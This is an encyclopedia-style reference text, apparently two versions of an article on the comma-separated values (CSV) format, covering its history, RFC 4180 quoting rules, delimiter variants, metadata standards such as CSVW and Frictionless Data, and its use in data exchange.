Comma-separated values
| Comma-separated values | |
|---|---|
| Filename extension | .csv |
| Internet media type | text/csv[1] |
| Uniform Type Identifier (UTI) | public.comma-separated-values-text[2] |
| UTI conformation | public.delimited-values-text[2] |
| Type of format | multi-platform, serial data streams |
| Container for | database information organized as field separated lists |
| Standard | RFC 4180 |
Comma-separated values (CSV) is a text data format that uses commas to separate values and newlines to separate records. CSV stores tabular data (numbers and text) in plain text, where each line typically represents one data record. Each record consists of the same number of fields, separated by commas. If the field delimiter itself may appear within a field, fields can be surrounded with quotation marks.[3] A CSV file is a file containing data in CSV format.
CSV is widespread in data applications and is widely supported by a variety of software, including common spreadsheet applications such as Microsoft Excel.[4] Benefits cited in favor of CSV include human readability and the simplicity of the format.[5]
The CSV file format was formalized in the 2005 technical standard RFC 4180, which defines the MIME type "text/csv" for the handling of text-based fields.
History
Comma-separated values is a data format that predates personal computers by more than a decade: the IBM Fortran (level H extended) compiler under OS/360 supported list-directed ("free form") input/output, with commas between values, in 1972.[6] List-directed input/output was defined in FORTRAN 77, approved in 1978. List-directed input used commas or spaces for delimiters, so unquoted character strings could not contain commas or spaces.[7]
The term "comma-separated value" and the "CSV" abbreviation were in use by 1983.[8] The manual for the Osborne Executive computer, which bundled the SuperCalc spreadsheet, documents the CSV quoting convention that allows strings to contain embedded commas.[9]
Comma-separated value lists were easier to type (for example onto punched cards) than fixed-column-aligned data, and they were less prone to producing incorrect results if a value was punched one column off from its intended location.
Comma-separated files are used for the interchange of database information between machines of two different architectures. The plain-text character of CSV files largely avoids incompatibilities such as byte order and word size. The files are largely human-readable, so it is easier to deal with them in the absence of perfect documentation or communication.[10]
The main standardization initiative—transforming "de facto fuzzy definition" into a more precise and de jure one—was in 2005, with RFC 4180, defining CSV as a MIME Content Type.[11] Later, in 2013, some of RFC 4180's deficiencies were tackled by a W3C recommendation.[12]
In 2014 IETF published RFC 7111 describing the application of URI fragments to CSV documents. RFC 7111 specifies how row, column, and cell ranges can be selected from a CSV document using position indexes.[13]
In 2015 the W3C, in an attempt to enhance CSV with formal semantics, published the first drafts of recommendations for CSV metadata standards, which became recommendations in December of the same year.[14]
Specification
Casually, the term "CSV" might refer to any file that:[1][15]
- Is plain text using a character encoding such as ASCII, various Unicode character encodings (e.g. UTF-8), EBCDIC, or Shift JIS;
- Consists of records (typically one record per line);
- Divides its records into fields separated by commas;
- Has the same sequence of fields for each record.
The 2005 technical standard RFC 4180 formalizes the CSV file format and defines the MIME type "text/csv" for the handling of text-based fields. However, the interpretation of the text of each field is still application-specific. Files that follow the RFC 4180 standard can simplify CSV exchange and should be widely portable. Among its requirements:
- MS-DOS-style lines that end with (CR/LF) characters (optional for the last line).
- An optional header record (there is no sure way to detect whether it is present, so care is required when importing).
- Each record should contain the same number of comma-separated fields.
- Any field may be quoted (with double quotes).
- Fields containing a line-break, double-quote or commas should be quoted. (If they are not, the file will likely be impossible to process correctly.)
- If double-quotes are used to enclose fields, then a double-quote in a field must be represented by two double-quote characters.
The format can be processed by most programs that claim to read CSV files. The exceptions are that (a) programs may not support line breaks within quoted fields, (b) programs may confuse the optional header with data or interpret the first data line as an optional header, and (c) double quotes in a field may not be parsed correctly automatically.
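The quoting requirements listed above can be illustrated with a short round trip. This is a minimal sketch using Python's standard csv module, whose default dialect happens to write CRLF line endings and doubled double quotes; the sample rows are made up for illustration, and the module is not claimed to be a complete RFC 4180 validator.

```python
import csv
import io

# Illustrative rows: one field with a comma, one with double quotes,
# and one with an embedded line break.
rows = [
    ["name", "note"],
    ["Smith, John", 'said "hi"'],
    ["Lee", "line one\nline two"],
]

# newline="" stops the text layer from translating line endings.
buf = io.StringIO(newline="")
writer = csv.writer(buf, lineterminator="\r\n")  # CRLF record terminator
writer.writerows(rows)
text = buf.getvalue()

# Reading the text back should recover the original rows,
# including the field that spans two physical lines.
parsed = list(csv.reader(io.StringIO(text, newline="")))
print(text)
print(parsed == rows)
```

Only the fields that need quoting are quoted here; a writer could also quote every field, which RFC 4180 permits.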
In 2011 the Open Knowledge Foundation (OKF) and various partners created a data protocols working group, which later evolved into the Frictionless Data initiative. One of the main formats they released was the Tabular Data Package. The Tabular Data Package was heavily based on CSV, using it as the main data transport format and adding basic type and schema metadata (CSV lacks any type information to distinguish the string "1" from the number 1).[16] The Frictionless Data initiative has also provided a standard CSV Dialect Description Format for describing different dialects of CSV, for example specifying the field separator or quoting rules.[17]
In 2013 the W3C "CSV on the Web" working group began to specify technologies providing higher interoperability for web applications using CSV or similar formats.[18] The working group completed its work in February 2016 and was officially closed in March 2016 with the release of a set of documents and W3C recommendations[19] for modeling "Tabular Data",[14] and enhancing CSV with metadata and semantics. While the well-formedness of CSV data can readily be checked, testing validity and canonical form is less well developed, relative to more precise data formats, such as XML and SQL, which offer richer types and rules-based validation.[20]
Features
CSV formats are best used to represent sets or sequences of records in which each record has an identical list of fields. This corresponds to a single relation in a relational database, or to data (though not calculations) in a typical spreadsheet.
The format dates back to the early days of business computing and is widely used to pass data between computers with different internal word sizes, data formatting needs, and so forth. For this reason, CSV files are common on all computer platforms.
CSV is a delimited text data format that uses a comma to separate values (many implementations of CSV import/export tools allow other separators to be used; for example, the use of a "Sep=^" row as the first row in a *.csv file will cause Excel to open the file expecting caret "^" to be the separator instead of comma ","). Simple CSV implementations may prohibit field values that contain a comma or other special characters such as newlines. More sophisticated CSV implementations permit them, often by requiring " (double quote) characters around values that contain reserved characters (such as commas, double quotes, or less commonly, newlines). Embedded double quote characters may then be represented by a pair of consecutive double quotes,[21] or by prefixing a double quote with an escape character such as a backslash (for example in Sybase Central).
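As a rough illustration of the two variations described above (a non-comma separator and backslash-escaped quotes), the following sketch uses Python's standard csv module. The sample strings are invented for the example, and the delimiter is passed explicitly; the "Sep=^" first-row convention is specific to Excel and is not interpreted here.

```python
import csv
import io

# A caret-separated file: commas inside fields need no quoting.
caret_text = "id^label\r\n1^a,b\r\n"
caret_rows = list(
    csv.reader(io.StringIO(caret_text, newline=""), delimiter="^")
)

# A dialect that escapes embedded double quotes with a backslash
# instead of doubling them.
escaped_text = '1,"say \\"hi\\""\r\n'
escaped_rows = list(
    csv.reader(
        io.StringIO(escaped_text, newline=""),
        doublequote=False,
        escapechar="\\",
    )
)

print(caret_rows)
print(escaped_rows)
```

A reader configured for one convention will generally misread data written with the other, which is why the dialect has to be agreed on or described separately.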
CSV formats are not limited to a particular character set.[1] They work just as well with Unicode in encodings such as UTF-8 or UTF-16 as they do with ASCII (although particular programs that support CSV may have their own limitations). CSV data normally will even survive naïve translation from one character set to another (unlike nearly all proprietary data formats). CSV does not, however, provide any way to indicate what character set is in use, so that must be communicated separately, or determined at the receiving end (if possible).
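Because the encoding is not recorded in the data itself, a reader has to be told which one to use. The sketch below, with hypothetical helper names encode_csv and decode_csv and made-up sample rows, shows the same table surviving UTF-8 and UTF-16 when the matching encoding is supplied, and silently turning into different text when the wrong one is assumed.

```python
import csv
import io

rows = [["city", "note"], ["Zürich", "naïve"]]

def encode_csv(rows, encoding):
    """Serialize rows as CSV text, then encode to bytes."""
    buf = io.StringIO(newline="")
    csv.writer(buf).writerows(rows)
    return buf.getvalue().encode(encoding)

def decode_csv(data, encoding):
    """Decode bytes with the given encoding, then parse as CSV."""
    return list(csv.reader(io.StringIO(data.decode(encoding), newline="")))

utf8_bytes = encode_csv(rows, "utf-8")
utf16_bytes = encode_csv(rows, "utf-16")

print(decode_csv(utf8_bytes, "utf-8") == rows)
print(decode_csv(utf16_bytes, "utf-16") == rows)
# Wrong guess: no error is raised, but the text is no longer the same.
print(decode_csv(utf8_bytes, "latin-1") == rows)
```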
Applications
CSV is a common data exchange format that is widely supported by consumer, business, and scientific applications. Among its most common uses is moving tabular data[22][23] between programs that natively operate on incompatible (often proprietary or undocumented) formats.[1] For example, a user may need to transfer information from a database program that stores data in a proprietary format, to a spreadsheet that uses a completely different format. Most database programs can export data as CSV. Most spreadsheet programs can read CSV data, allowing CSV to be used as an intermediate format when transferring data from a database to a spreadsheet. Every major ecommerce platform provides support for exporting data as a CSV file.[24]
CSV is also used for storing data. Common data science tools such as Pandas include the option to export data to CSV for long-term storage.[25] Benefits of CSV for data storage include its simplicity, which makes parsing and creating CSV files easy to implement and fast compared to other data formats; human readability, which makes editing or fixing data simpler;[26] and high compressibility, which leads to smaller data files.[27] On the other hand, CSV does not support more complex data relations and makes no distinction between null and empty values, so other formats are preferred in applications where these features are needed.
More than 200 local, regional, and national data portals, such as those of the UK government and the European Commission, use CSV files with standardized data catalogs.[28]
Some applications use CSV as a data interchange format to enhance its interoperability, exporting and importing CSV. Others use CSV as an internal format. CSV is supported by almost all spreadsheets and database management systems.
Spreadsheets including Apple Numbers, LibreOffice Calc, and Apache OpenOffice Calc support reading CSV files. Microsoft Excel also supports a dialect of CSV with restrictions in comparison to other spreadsheet software (e.g., as of 2019 Excel still cannot export CSV files in the commonly used UTF-8 character encoding, and the separator is not required to be a comma). The LibreOffice Calc CSV importer is actually a more generic delimited text importer, supporting multiple separators at the same time as well as field trimming.
Various relational databases support saving query results to a CSV file. PostgreSQL provides the COPY command, which allows for both saving and loading data to and from a file. For example, COPY (SELECT * FROM articles) TO '/home/wikipedia/file.csv' (FORMAT csv) saves the content of the table articles to a file called /home/wikipedia/file.csv.[29] Some relational databases, when using standard SQL, offer a foreign-data wrapper (FDW). For example, PostgreSQL offers the CREATE FOREIGN TABLE[30] and CREATE EXTENSION file_fdw[31] commands to configure any variant of CSV. Databases like Apache Hive offer the option to express CSV or .csv.gz as an internal table format.
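The same idea of saving a query result as CSV can be sketched without a PostgreSQL server. The example below is an assumption-laden stand-in: it uses SQLite through Python's standard sqlite3 module rather than the COPY command, and the articles table and its contents are invented for illustration.

```python
import csv
import io
import sqlite3

# In-memory database with a small, made-up table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE articles (id INTEGER, title TEXT)")
conn.executemany(
    "INSERT INTO articles VALUES (?, ?)",
    [(1, "CSV"), (2, "Tab, separated")],
)

cursor = conn.execute("SELECT id, title FROM articles ORDER BY id")

out = io.StringIO(newline="")
writer = csv.writer(out)
# Column names from the cursor become the header record.
writer.writerow([col[0] for col in cursor.description])
# Each result row becomes one CSV record.
writer.writerows(cursor)
exported = out.getvalue()
conn.close()

print(exported)
```

Writing to a real file instead of a string would only require replacing the StringIO object with a file opened with newline="".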
Programs that work with CSV may have limits on the maximum number of rows CSV files can have. Examples include Microsoft Excel (1,048,576 rows), Apple Numbers (1,000,000 rows), Google Sheets (10,000,000 cells), and OpenOffice and LibreOffice (1,048,576 rows).[32]
See also
- Comparison of data-serialization formats
- Delimiter collision – Character(s) for specifying the boundary between regions of data
- Flat-file database – Database stored as flat data
References
- ^ a b c d Shafranovich, Y. (October 2005). Common Format and MIME Type for CSV Files. IETF. p. 1. doi:10.17487/RFC4180. RFC 4180.
- ^ a b "commaSeparatedText". Apple Developer Documentation: Uniform Type Identifiers. Apple Inc. Archived from the original on 2023-05-22. Retrieved 2023-05-22.
- ^ "CSV Comma Separated Value File Format - How To - Creativyst - Explored,Designed,Delivered.(sm)". Creativyst Software. Archived from the original on 1 April 2021. Retrieved 22 August 2023.
- ^ "Import or export text (.txt or .csv) files". Microsoft Support. Retrieved 2023-08-16.
- ^ "What is a CSV file: A comprehensive guide". flatfile.com. Retrieved 2024-10-28.
- ^ IBM FORTRAN Program Products for OS and the CMS Component of VM/370 General Information (PDF) (first ed.), July 1972, p. 17, GC28-6884-0, archived (PDF) from the original on March 4, 2016, retrieved February 5, 2016. "For users familiar with the predecessor FORTRAN IV G and H processors, these are the major new language capabilities"
- ^ "List-Directed I/O", Fortran 77 Language Reference, Oracle, archived from the original on 2021-02-26, retrieved 2012-10-26
- ^ "SuperCalc², spreadsheet package for IBM, CP/M". Retrieved December 11, 2017.
- ^ "Comma-Separated-Value Format File Structure". 1983. Retrieved December 11, 2017.
- ^ "CSV, Comma Separated Values (RFC 4180)". Library of Congress. Retrieved September 22, 2025.
- ^ Common Format and MIME Type for Comma-Separated Values (CSV) Files. doi:10.17487/RFC4180. RFC 4180. Retrieved December 22, 2020.
- ^ See sparql11-results-csv-tsv, the first W3C recommendation scoped in CSV and filling some of RFC 4180's deficiencies.
- ^ URI Fragment Identifiers for the text/csv Media Type. doi:10.17487/RFC7111. RFC 7111. Retrieved December 22, 2020.
- ^ a b "Model for Tabular Data and Metadata on the Web". 17 December 2015. Retrieved March 23, 2016. (W3C Recommendation)
- ^ "Comma Separated Values (CSV) Standard File Format". Edoceo, Inc. Archived from the original on July 14, 2020. Retrieved June 4, 2014.
- ^ "Tabular Data Package". Frictionless Data Specs.
- ^ "CSV Dialect". Frictionless Data Specs.
- ^ "CSV on the Web Working Group". W3C CSV WG. 2013. Retrieved 2015-04-22.
- ^ "CSV on the Web Repository". GitHub. (on GitHub)
- ^ "Rules Or Schemas". CsvPath Project. 2024. Retrieved 2025-02-13.
- ^ *Creativyst (2010), How To: The Comma Separated Value (CSV) File Format, creativyst.com, archived from the original on April 4, 2021, retrieved May 24, 2010
- ^ "CSV - Comma Separated Values". Archived from the original on 2021-03-07. Retrieved 2017-12-02.
- ^ "CSV Files". Archived from the original on April 30, 2021. Retrieved June 4, 2014.
- ^ "CSV Supported Ecommerce Platforms". RFM Calc. Retrieved 2025-03-09.
- ^ "pandas.DataFrame.to_csv — pandas 2.0.3 documentation". pandas.pydata.org. Retrieved 2023-08-16.
- ^ "CSV Format: History, Advantages and Why It Is Still Popular". ByteScout. 2021-09-15. Retrieved 2023-08-16.
- ^ "Comparison of different file formats in Big Data". www.adaltas.com. 2020-07-23. Retrieved 2023-08-16.
- ^ Mahmud, S M Hasan; Hossin, Md Altab; Jahan, Hosney; Noori, Sheak Rashed Haider; Bhuiyan, Touhid (2018). CSV-ANNOTATE: Generate annotated tables from CSV file. 2018 International Conference on Artificial Intelligence and Big Data (ICAIBD). IEEE. pp. 71–75. doi:10.1109/ICAIBD.2018.8396169. ISBN 978-1-5386-6987-7.
- ^ "Documentation: 14: COPY". PostgreSQL. Retrieved 2024-05-12.
- ^ "Documentation: 14: F.35. postgres_fdw". PostgreSQL. 2022-02-10. Retrieved 2022-03-04.
- ^ "Documentation: 14: F.14. file_fdw". PostgreSQL. 2022-02-10. Retrieved 2022-03-04.
- ^ "Understanding CSV and row limits". Archived from the original on January 15, 2021. Retrieved Feb 28, 2021.
Further reading
- "IBM DB2 Administration Guide - LOAD, IMPORT, and EXPORT File Formats". IBM. Archived from the original on 2016-12-13. Retrieved 2016-12-12. (Has file descriptions of delimited ASCII (.DEL) (including comma- and semicolon-separated) and non-delimited ASCII (.ASC) files for data transfer.)
Comma-separated values
Comma-separated values (CSV) is a plain-text format for tabular data in which fields are separated by commas (,) and records are delimited by line breaks, typically CRLF (carriage return followed by line feed).[1] The format supports an optional header row as the first line to identify field names, and fields containing commas, line breaks, or double quotes must be enclosed in double quotes, with internal double quotes escaped by doubling them.[1] Standardized in RFC 4180 in October 2005, CSV was developed to formalize a long-existing convention for data exchange between spreadsheet programs and other applications, with the specification also registering the MIME type text/csv for consistent handling in internet protocols.[1][2]
Prior to formal standardization, the CSV format had been in use for decades as a simple, human-readable method for representing structured data in plain text, originating as an early approach to data portability in computing environments like early database and spreadsheet systems.[2] Despite variations in implementation across tools—such as differing handling of delimiters, quoting, or encoding—RFC 4180 provides a common baseline, requiring each record to have the same number of fields and restricting characters to printable ASCII excluding certain control codes.[1][3] This simplicity has made CSV ubiquitous for importing and exporting data in software like Microsoft Excel, databases such as MySQL and PostgreSQL, and statistical tools, with institutions like the U.S. Library of Congress holding over 840,000 CSV files in their collections as of 2024 for preservation purposes.[3]
CSV's advantages include its lightweight nature, platform independence, and ease of parsing without specialized software, though it lacks built-in support for data types, metadata, or complex structures, often necessitating external documentation for full interpretation.[3] Recommended by bodies like the UK Open Standards Board for government tabular data publication, the format remains a de facto standard for open data initiatives, such as those on Data.gov, due to its high adoption and transparency.[4][3] While alternatives like JSON or XML offer more features for hierarchical data, CSV's efficiency for flat, tabular datasets ensures its continued prominence in data science, reporting, and interoperability.[3]
Overview
Definition
Comma-Separated Values (CSV) is a delimited text file format designed for storing and exchanging tabular data in a simple, plain-text structure. In this format, each line represents a single row of the table, with individual fields or values within the row separated by commas, and rows delimited by line breaks such as carriage return and line feed (CRLF). This approach allows CSV files to represent structured data like spreadsheets without relying on binary or proprietary encodings, making them widely portable across different systems and applications.[1]
The primary purpose of CSV is to facilitate straightforward data interchange between diverse software, including spreadsheet programs, databases, and data analysis tools, while maintaining human readability in any standard text editor. By using only basic delimiters and line breaks, CSV avoids the need for specialized software to view or edit the content, promoting interoperability in data processing workflows. This simplicity has made it a de facto standard for data export and import in fields ranging from business analytics to scientific research.[1][5]
CSV supports both ASCII and Unicode characters, with the format defined in terms of the US-ASCII character set by default, though files can be encoded in UTF-8 or other schemes to accommodate international text; however, the CSV specification includes no built-in mechanism for declaring the character encoding, which must be handled externally via MIME types or file metadata. For illustration, a basic CSV file might begin with a header row such as:
Name,Age,City
Alice,30,New York
Bob,25,Los Angeles
This example demonstrates how the format encodes a simple table where the first line defines column names, and subsequent lines provide corresponding values.[1]
Basic Structure
Comma-separated values (CSV) files represent tabular data in plain text format, where each line corresponds to a record and fields within records are delimited by commas. The primary field delimiter is the comma character (,), which separates individual values in a row. Records are separated by line breaks, specifically the carriage return followed by line feed (CRLF, or %x0D %x0A in hexadecimal notation), though some implementations accept LF alone.[6]
A CSV file may include an optional header row as the first line, containing column names in the same format as data records; applications typically interpret this row as headers to label fields. All lines in the file should contain the same number of fields to maintain structural integrity, and spaces adjacent to delimiters are considered part of the field values rather than whitespace to trim. While the final record does not require a terminating line break, consistent use of the same line terminator throughout the file is recommended for compatibility across systems.[6]
For illustration, a simple CSV file without quoted fields might be structured as follows, representing fruit inventory data:
fruit,color,quantity
apple,red,1
banana,yellow,2
This example shows a header row followed by two data records, each terminated by a newline.[6]
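A reader that treats the first line as a header can map each later record to the column names. The following is a minimal sketch using csv.DictReader from Python's standard library on the fruit data above; the second snippet, with an invented input string, shows that a space after a delimiter is kept as part of the field by default.

```python
import csv
import io

text = "fruit,color,quantity\napple,red,1\nbanana,yellow,2\n"

# DictReader takes the first record as the header and yields one
# mapping per data record; every value is still a string.
records = list(csv.DictReader(io.StringIO(text, newline="")))
for record in records:
    print(record["fruit"], record["quantity"])

# Spaces next to a delimiter belong to the field value.
spaced = next(csv.reader(io.StringIO("a, b\n", newline="")))
print(spaced)
```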
History
Origins
The origins of comma-separated values (CSV) trace back to the early 1970s in mainframe computing environments, where the need for simple, human-readable data interchange formats emerged alongside the growth of programming languages and data processing tools. The first documented use of a CSV-like mechanism appeared in 1972 with the IBM FORTRAN IV (H Extended) compiler for the OS/360 operating system. This compiler introduced list-directed input/output, a feature that allowed data entries to be separated by blanks or commas in free-form input, with successive commas indicating omitted values; for example, "5.,33.44,5.E-9/" could parse multiple numeric fields without rigid formatting. This capability simplified data entry for scientific and engineering computations on IBM System/360 mainframes, marking an early step toward delimited text formats for tabular data transfer.[7]
During the late 1970s and early 1980s, CSV-like formats spread informally through the burgeoning personal computing and spreadsheet software ecosystems, driven by the demand for portable data exchange between applications. VisiCalc, released in 1979 as the first electronic spreadsheet for the Apple II, exemplified this trend by incorporating comma-separated lists in its command syntax and function arguments, such as in expressions like "@SUM(A1,B1,C1)" for aggregating values across cells. This usage facilitated basic data manipulation and import/export operations, though VisiCalc primarily relied on its proprietary DIF (Data Interchange Format) for file storage. Similar ad hoc delimited formats appeared in early database tools and word processors, enabling users to transfer tabular data via text files without specialized hardware, but implementations remained vendor-specific and prone to compatibility issues.
The explicit term "comma-separated values" and its abbreviation "CSV" emerged by 1983, coinciding with the rise of portable computers and bundled productivity software. The Osborne Executive, a Z80-based luggable computer released that year, included SuperCalc, a popular spreadsheet program from Sorcim, as standard software. The Osborne Executive Reference Guide documented CSV as a file format for exporting spreadsheet data, using commas to delimit fields and newlines for records, which allowed seamless transfer to other programs like word processors or databases. This naming formalized the concept within microcomputer documentation, reflecting its growing utility for non-programmers handling business and financial data.[8]
Pre-standardization implementations during this period exhibited significant variations, particularly in handling special cases that could disrupt parsing. For instance, early tools like those in FORTRAN and SuperCalc often lacked consistent quoting conventions, leaving fields containing embedded commas, quotes, or line breaks unescaped or ambiguously delimited. Without uniform rules for enclosures or escapes, data interchange frequently required manual adjustments, highlighting the format's informal, evolving nature before broader adoption.[7]
Standardization
The standardization of comma-separated values (CSV) began in earnest in the early 21st century, as informal practices from earlier computing eras gave way to formal specifications aimed at ensuring interoperability across systems.[1] In October 2005, the Internet Engineering Task Force (IETF) published RFC 4180, titled "Common Format and MIME Type for Comma-Separated Values (CSV) Files," which codified CSV as an informal standard by documenting its common format and registering the "text/csv" MIME type in accordance with RFC 2048.[1] This document outlined specific rules for CSV files, including requirements for headers, field delimiters, quoting mechanisms, and line endings, to promote consistent parsing and generation of CSV data without prescribing a rigid syntax.[1]
Building on this foundation, the Frictionless Data Initiative, a project of the Open Knowledge Foundation, introduced the Table Schema specification on November 12, 2012, providing a JSON-based format for declaring schemas that add semantic metadata to tabular data, particularly CSV files.[9] Table Schema enables the definition of fields, data types, constraints, and foreign keys, facilitating validation, documentation, and enhanced interoperability for CSV datasets in open data ecosystems.[9]
In January 2014, the IETF extended CSV support through RFC 7111, "URI Fragment Identifiers for the text/csv Media Type," which defined mechanisms for referencing specific parts of CSV entities using URI fragments, such as rows, columns, or cells, to enable precise linking and subset extraction.[10]
Finally, in December 2015, the World Wide Web Consortium (W3C) released a set of recommendations under the "CSV on the Web" initiative, including the "Model for Tabular Data and Metadata on the Web" and an associated metadata vocabulary, to standardize the annotation and conversion of CSV files into richer web-accessible formats like RDF. These W3C standards emphasized integrating CSV with web architectures, supporting metadata for tabular data to improve discoverability and linkage on the Semantic Web.
Technical Specification
Core Rules
The core rules for comma-separated values (CSV) are defined in RFC 4180, which provides a minimal specification for the format to ensure interoperability in data interchange.[1] A CSV file consists of one or more records, each represented as a single line delimited by a line break (CRLF); the final record may omit the line terminator. Fields within a record are delimited by commas, with each record having the same number of fields to maintain structural consistency. Empty fields are indicated by two consecutive commas: given the header name,age,city, the record John,,New York has an empty age field, and a record beginning with ,, has two leading empty fields in a three-field record.[1]
The first line of a CSV file, if present, serves as a header row containing field names, which subsequent data records align with positionally; this header is optional but recommended for clarity in identifying columns. For instance, a simple file might begin with ID,Name,Department on the first line, followed by data lines like 1,Alice,Engineering.[1]
CSV has no built-in schema or data type enforcement, treating all field content as unstructured strings by default, which allows flexibility but requires external validation for semantic integrity.[1]
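The two points above, that consecutive commas denote empty fields and that every value arrives as an untyped string, can be seen with a short sketch using Python's standard csv module. The sample data and the helper to_int_or_none are hypothetical; how an empty field should be interpreted (empty string, null, zero) is an application decision, not something the format specifies.

```python
import csv
import io

text = "name,age,city\r\nJohn,,New York\r\n,,Paris\r\n"
rows = list(csv.reader(io.StringIO(text, newline="")))

# Empty fields come back as empty strings; nothing is typed.
print(rows[1])
print(rows[2])

def to_int_or_none(value):
    """Application-level choice: treat an empty field as missing."""
    return int(value) if value.strip() else None

ages = [to_int_or_none(row[1]) for row in rows[1:]]
print(ages)
```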
Handling Special Characters
In comma-separated values (CSV) files, fields that contain special characters such as commas, double quotes, or line breaks (CRLF) should be enclosed in double quotes to prevent misinterpretation during parsing.[1] This quoting mechanism ensures that the delimiter comma is not confused with embedded commas within the data, allowing for the accurate representation of complex text values.[1] To handle double quotes appearing inside a quoted field, the specification requires that such internal quotes be escaped by doubling them, replacing a single double quote with two consecutive double quotes.[1] For instance, a field containing the text He said "hello" would be represented as "He said ""hello""" within the CSV record.[1] This escaping rule applies only within quoted fields and preserves the original data without introducing additional delimiters.[1]
Quoting is optional for fields that do not contain commas, double quotes, or line breaks, as unquoted fields must consist solely of non-special characters to avoid parsing errors.[1] However, for consistency and to mitigate potential issues in varied implementations, many applications quote all fields regardless.[1] An example of a CSV record handling an embedded comma and a line break is:
"Smith, John",25,"New York, NY
with a line break"
Here, the first and third fields are quoted to enclose the comma in the name and the line break in the address, respectively.[1] This approach aligns with the formal grammar defined in the specification, where fields are either escaped (quoted with possible internal escapes) or non-escaped (plain text without special characters).[1]
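To see why a quote-aware parser matters for a record like this, the sketch below parses it with Python's standard csv module and contrasts the result with naive splitting on line breaks and commas. The record is the one shown above, written with CRLF line endings as an assumption.

```python
import csv
import io

text = '"Smith, John",25,"New York, NY\r\nwith a line break"\r\n'

# Quote-aware parsing: one record with three fields, the last of
# which keeps its embedded line break.
rows = list(csv.reader(io.StringIO(text, newline="")))
print(len(rows), len(rows[0]))
print(repr(rows[0][2]))

# Naive splitting breaks the record at the embedded line break and
# at the commas inside the quoted fields.
naive_first_line = text.split("\r\n")[0].split(",")
print(len(naive_first_line))
```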
Variants and Dialects
Alternative Delimiters
While the comma serves as the standard delimiter for comma-separated values (CSV) files as defined in RFC 4180, various alternative delimiters are employed to address regional conventions, data content conflicts, and specific application needs.[11] In many Western European locales, where the comma is conventionally used as a decimal separator (for instance, representing π as 3,14), the semicolon (;) is adopted as the field delimiter to prevent ambiguity in numerical data.[12] This practice aligns with Excel's handling of CSV files in those regions and is implemented in tools like R's write.csv2 function, which pairs the semicolon delimiter with comma-based decimals.[13]
Tab-separated values (TSV) represent a precise variant of delimited files, utilizing the horizontal tab character (\t) as the separator instead of the comma.[14] TSV is favored in scenarios where tabs are less likely to occur within field content, thereby minimizing the need for quoting and simplifying parsing compared to CSV.[15]
Custom dialects often incorporate the pipe character (|) as a delimiter, particularly in finance and related sectors where data may frequently contain commas, semicolons, or tabs.[16] This choice enhances readability and reduces errors in environments requiring robust separation of fields like transaction records or invoice details.
Locale-specific adaptations further influence delimiter selection, with applications such as Microsoft Excel automatically applying the appropriate separator, such as a semicolon in European settings, based on Windows regional configurations to maintain compatibility across diverse user environments.[17]
Extensions and Metadata
To enhance the usability of comma-separated values (CSV) files beyond their basic structure, various extensions introduce metadata for describing data semantics, validation rules, and relationships. The W3C's Metadata Vocabulary for Tabular Data, published as a recommendation in 2015, defines a JSON-based format to annotate CSV and other tabular data with information such as field types (e.g., string, integer, date), constraints (e.g., minimum or maximum values), and foreign keys to link tables.[18] This vocabulary allows metadata to be provided in a separate sidecar file, enabling processors to validate data types and infer relationships without relying solely on the raw CSV content.[18]
Similarly, the Frictionless Data initiative's Tabular Data Package specification, developed since 2011, extends CSV by pairing it with a JSON descriptor file that outlines the schema, including field names, types, formats, and constraints.[19] This approach uses a "sidecar" JSON file to define the structure of the accompanying CSV, promoting interoperability and automated validation in data pipelines.[9] For instance, the specification supports detailed type definitions, such as specifying a date field with a format like "YYYY-MM-DD" to ensure consistent parsing across tools.[9]
Within the CSV on the Web (CSVW) framework, dialect descriptions provide programmatic metadata to customize parsing rules, including delimiters, quoting conventions, and header presence, while integrating with the broader metadata vocabulary for semantic annotations.[18] An example metadata file for a CSV containing dates might include a JSON object like { "dc:title": "Sales Data", "tableSchema": { "columns": [{ "name": "sale_date", "datatype": { "base": "date", "format": "yyyy-MM-dd" } }] } }, which instructs processors to interpret the "sale_date" column as dates in ISO 8601 format, preventing misinterpretation during import.[18]
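The sidecar idea can be sketched in a few lines: a JSON descriptor names each column's type, and a loader uses it to convert the raw strings. The descriptor layout, the CASTS table, and the load_typed function below are simplified assumptions made for illustration; they do not follow the actual CSVW or Tabular Data Package schemas and are not a substitute for a conforming validator.

```python
import csv
import io
import json
from datetime import date

# Hypothetical, simplified descriptor (not the CSVW or Frictionless format).
descriptor = json.loads(
    '{"columns": ['
    '{"name": "sale_date", "type": "date"},'
    '{"name": "amount", "type": "integer"}]}'
)

# Converters for the type names this sketch understands.
CASTS = {"date": date.fromisoformat, "integer": int, "string": str}

def load_typed(text, descriptor):
    """Parse CSV text and convert each field using the descriptor."""
    casts = {col["name"]: CASTS[col["type"]] for col in descriptor["columns"]}
    typed = []
    for record in csv.DictReader(io.StringIO(text, newline="")):
        # A value that does not match its declared type raises ValueError.
        typed.append({name: casts[name](value) for name, value in record.items()})
    return typed

text = "sale_date,amount\r\n2024-01-31,120\r\n"
typed = load_typed(text, descriptor)
print(typed)
```

Keeping the descriptor outside the CSV file means the data stays readable by tools that know nothing about the metadata.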
Usage and Applications
Data Interchange
Comma-separated values (CSV) files serve as a fundamental medium for data interchange due to their simplicity and broad compatibility, enabling transfer of tabular data between diverse systems without requiring specialized software. The format is particularly valued in workflows that export structured data from relational databases, such as SQL-based systems, where queries generate CSV output for analysis or migration. For instance, database management systems like MySQL support direct export to CSV using statements of the form SELECT ... INTO OUTFILE, facilitating the movement of large datasets to spreadsheet applications for further manipulation. Conversely, spreadsheets such as Microsoft Excel or Google Sheets can import CSV files to populate tables, allowing users to perform ad-hoc analysis on database-derived data. This bidirectional flow underscores CSV's role in bridging enterprise data storage with end-user tools, as it preserves tabular structure while remaining lightweight and human-readable.
In e-commerce, CSV is widely used to manage product catalogs through bulk import and export operations across platforms. Systems like WooCommerce enable merchants to upload CSV files containing product details (including SKUs, prices, descriptions, and inventory levels) to populate online stores efficiently, often handling thousands of items in a single operation. Similarly, Salesforce B2C Commerce utilizes CSV for catalog synchronization, allowing businesses to update product listings across multiple channels without manual entry. This interchange capability reduces operational overhead in dynamic retail environments, where frequent catalog updates are essential for maintaining accurate inventory and pricing.
Government portals leverage CSV for disseminating open data, promoting transparency and public access to information. Platforms like Data.gov mandate machine-readable formats for federal datasets, with CSV being a primary choice for tabular releases such as economic indicators or public health statistics, downloadable directly from agency repositories. The format's ubiquity ensures compatibility with analysis tools, enabling researchers and citizens to integrate government data into local workflows without format conversion. Internationally, similar portals, including those cataloged by Data.gov, provide CSV exports to standardize open data sharing across jurisdictions.
